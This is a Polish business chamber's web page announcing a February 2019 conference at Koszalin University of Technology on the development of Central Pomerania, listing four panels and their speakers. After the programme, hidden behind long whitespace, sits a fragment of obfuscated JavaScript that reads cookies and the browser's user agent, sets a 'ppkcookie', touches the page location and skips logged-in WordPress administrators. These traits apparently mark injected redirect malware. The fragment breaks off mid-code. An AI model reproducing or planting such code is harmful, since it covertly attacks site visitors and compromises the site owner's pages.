Szanse i Zagrożenia Rozwoju Społeczno-Gospodarczego Regionu Pomorza Środkowego – Konferencja | Północna Izba Gospodarcza w Koszalinie

 

Zapraszamy na konferencję nt. Szanse i Zagrożenia Rozwoju Społeczno-Gospodarczego Regionu Pomorza Środkowego, która odbędzie się 27 lutego 2019 (środa) o godz.10 na Politechnice Koszalińskiej w Auli Wydziału Nauk Ekonomicznych przy ul. E. Kwiatkowskiego 6e. Północna Izba Gospodarcza w Koszalinie jest współorganizatorem konferencji. Zapraszam członków Izby do aktywnego udziału w wydarzeniu i udziału w dyskusji na temat Rozwoju Pomorza Środkowego.

Celem głównym konferencji jest analiza i ocena szans oraz zagrożeń w rozwoju społeczno-gospodarczym wschodniej części województwa zachodniopomorskiego i zachodniej części województwa pomorskiego, będących częściami Regionu Pomorza Środkowego. Celem szczegółowym jest identyfikacja możliwości rozwoju rejonów i obszarów wiejskich oraz miast i miejscowości Pomorza Środkowego. Uczestnikami konferencji są samorządowcy: prezydenci miast, starostowie, burmistrzowie i wójtowie, przedsiębiorcy Regionu Pomorza Środkowego oraz pracownicy naukowi Politechniki Koszalińskiej i Akademii Pomorskiej w Słupsku.

PROGRAM KONFERENCJI

SZANSE I ZAGROŻENIA ROZWOJU SPOŁECZNO-GOSPODARCZEGO
REGIONU POMORZA ŚRODKOWEGO

pod patronatem JM Rektora Politechniki Koszalińskiej

prof. dr hab. inż. Tadeusza Bohdala

27 lutego 2019 r.

 

10.00 Otwarcie konferencji

10.15 – 11.00   PANEL I Analiza i ocena rozwoju społeczno-gospodarczego regionu Pomorza Środkowego –  moderator – dr hab. inż. Jerzy Korczak, prof. PK

 • Kapitał społeczny i jego oddziaływanie na rozwój Pomorza Środkowego
  dr hab. Iwona Jażewicz prof. AP, dr Gabriela Kaniewska, AP
 • Znaczenie budowy drogi szybkiego ruchu S11 dla rozwoju Pomorza Środkowego
  dr Patrycjusz Zarębski, WNE PK
 • Stan i perspektywy rozwoju turystyki na Pomorzu Środkowym – dr Grzegorz Kwiatkowski, WNE PK
 • Możliwości rozwoju miast średnich układu multipolarnego Pomorza Środkowego
  w świetle czynników endo- i egzogenicznych
  – dr Mariusz Miedziński, AP

11.00 – 11.45  PANEL II Przedsiębiorczość a rozwój Pomorza Środkowego – moderator – dr hab. Iwona Jażewicz, prof. AP

 • Wpływ RPO na rozwój gospodarczy Regionu Pomorza Środkowego
  dr inż. Romuald Sobieralski, Przewodniczący Rady Koszalińskiej Izby Przemysłowo –  Handlowej
 • Wspólna strategia warunkiem rozwoju gospodarczego Pomorza Środkowego –
  dr inż. Wiesław Zinka, Wiceprezes Zarządu Business Centre Club, Kanclerz Loży Koszalińskiej
 • Rozwój Pomorza Środkowego w kontekście rozwoju wysokich technologii – Arkadiusz Śmigielski, Prezes Zarządu OptiNav Sp. z o.o.
 • Rola przedsiębiorców w rozwoju Pomorza Środkowego – Robert Bodendorf, Prezes Zarządu Zachodniopomorskiego Związku Przedsiębiorców i Pracodawców

11.45 – 12.00    Przerwa

12.00 – 12.45    PANEL III Wpływ samorządów na rozwój Pomorza Środkowego – moderator  – prof. dr hab. Michał Jasiulewicz

 • Piotr Jedliński – Prezydent Koszalina
 • Krystyna Danilecka – Wojewódzka – Prezydent Słupska
 • Waldemar Miśko – Burmistrz Karlina
 • Grzegorz Lipski – Burmistrz Polanowa
 • Krzysztof Lis – Starosta Szczecinecki

12.45 – 13.45   PANEL IV – DEBATA – moderator: dr Adam Wyszomirski, WNE

 • Emilia Bury – Burmistrz Białogardu
 • Krzysztof Frankenstein – Burmistrz Sławna
 • Magdalena Majewska – Burmistrz Kępic
 • Lech Wojciechowski – Prezes EkoWodrol Sp. z o.o.
 • Roman Biłas – Prezes Koszalińskiego Oddziału Północnej Izby Gospodarczej

13.45 – 14.00   Podsumowanie konferencji – dr hab. Danuta Zawadzka, prof. PK

14.00  Lunch

 

                                                                

 

                                                                               'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m